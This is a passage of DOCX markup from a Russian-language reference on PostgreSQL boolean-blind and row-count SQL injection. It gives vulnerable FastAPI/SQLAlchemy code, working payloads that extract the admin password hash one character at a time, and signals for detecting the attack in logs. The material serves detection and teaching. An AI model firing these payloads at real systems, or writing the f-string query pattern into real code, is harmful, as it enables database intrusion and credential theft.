          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>substring(string, from, count)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> возвращает подстроку; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ascii(string)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> возвращает ASCII-код первого символа; для пустой строки — NULL. Бинарный поиск работает </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">потому, что каждый запрос даёт один бит информации, что классически даёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>log₂(256) = 8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> запросов на байт.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01063E3D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Любая версия PG. Application-роль должна иметь </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на таблицу-источник. Возможность сделать сотни запросов. Тонкость с Unicode: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ascii()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в PG возвращает Unicode codepoint первого символа. Для bcrypt-хешей и base64-токенов это нерелевантно.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="678E4A87"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substring()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ascii()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — повседневные SQL-функции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58CE08DD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Конкретные сигналы атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7336FA32" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>substring(&lt;subquery&gt;, N, 1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE WHEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;subquery&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обращается к таблице, не упомянутой во внешнем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F29504B"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pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: тысячи запросов одной формы, отличающихся только цифрой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>substring(..., N, 1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и числом для сравнения </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt; K</w:t>
      </w:r>
      <w:r>
        <w:t>. Самый яркий маркер boolean-blind.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EFA181A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Запросы упорядочены так, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> монотонно растёт в коротком окне.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7B6288" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Все поддерживаемые версии PG.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377FC104" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 3.3.1, 3.3.3, 3.2.3, 3.4.1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1C867A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PortSwigger SQL injection cheat sheet — Conditional responses; HackTricks: PostgreSQL injection — Boolean based; PostgreSQL Documentation: String Functions and Operators.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505FCFDC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>3.3.3 Row-count канал через tautology</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B60716" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Суть.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Когда инъекция попадает в булев контекст в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> напрямую, нет необходимости в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE WHEN</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Достаточно дописать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AND &lt;cond&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR &lt;cond&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="103A9A81" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уязвимый код.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33461397" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># api/views.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226A61B2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>from sqlalchemy import text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6632BB55" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4349ABA2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@app.get("/users")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4A3413" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def search_users(name: str):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45BCAF05" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    sql = f"SELECT id, login FROM users WHERE login = '{name}'"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72931EDE"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11141281"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4A16890C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        return [dict(row) for row in result.mappings()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D947550"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name</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236563BE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Базовый row-count oracle:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B03629" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin' AND (SELECT current_user) = 'app_user' --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1A76F9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0452EB27" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, login FROM users WHERE login = 'admin' AND (SELECT current_user) = 'app_user' --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C13EF96" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Условие истинно: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE login = 'admin' AND TRUE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → возвращает запись </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23DB4514" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Условие ложно: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE login = 'admin' AND FALSE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → возвращает пусто.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DF5E636" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Боевой пример — побитовое извлечение хеша:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8D6634" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>admin' AND ascii(substring((SELECT password_hash FROM users WHERE login='admin'), 1, 1)) &gt; 64 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4496C8C2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Вариант с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A09B95" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>nobody' OR (SELECT current_user) = 'app_user' --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177D8C8E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Истинно: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE FALSE OR TRUE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → возвращает все строки таблицы. Шумный oracle, но рабочий.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4685ECDE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Ложно: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE FALSE OR FALSE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> → пусто.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADCCCDA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Посимвольное извлечение без обёртки. Преимущества: короче payload, не нужны касты типов, применим в строковых контекстах. Недостатки: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR true</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> возвращает все строки таблицы — может быть отрезан timeout-ом.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23AB969F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Это та же булева алгебра, что в 3.3.1, но без посредника </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CASE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. PG-планировщик видит </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE A AND B</w:t>
      </w:r>
      <w:r>
        <w:t>, вычисляет оба, возвращает строки только если оба TRUE. Самая базовая семантика SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08BE19EC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Любая версия PG. Уязвимая точка инъекции в булевом контексте </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF52322"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AND</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — основа SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A51DC97" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:t>Конкретные сигналы атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318875D5"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WHERE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> появилась подстрока </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AND (SELECT ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR (SELECT ...)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, где </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;subquery&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обращается к таблице, не упомянутой во внешнем </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B1D3249" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Внутри </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AND</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> появилось обращение к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>current_user</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
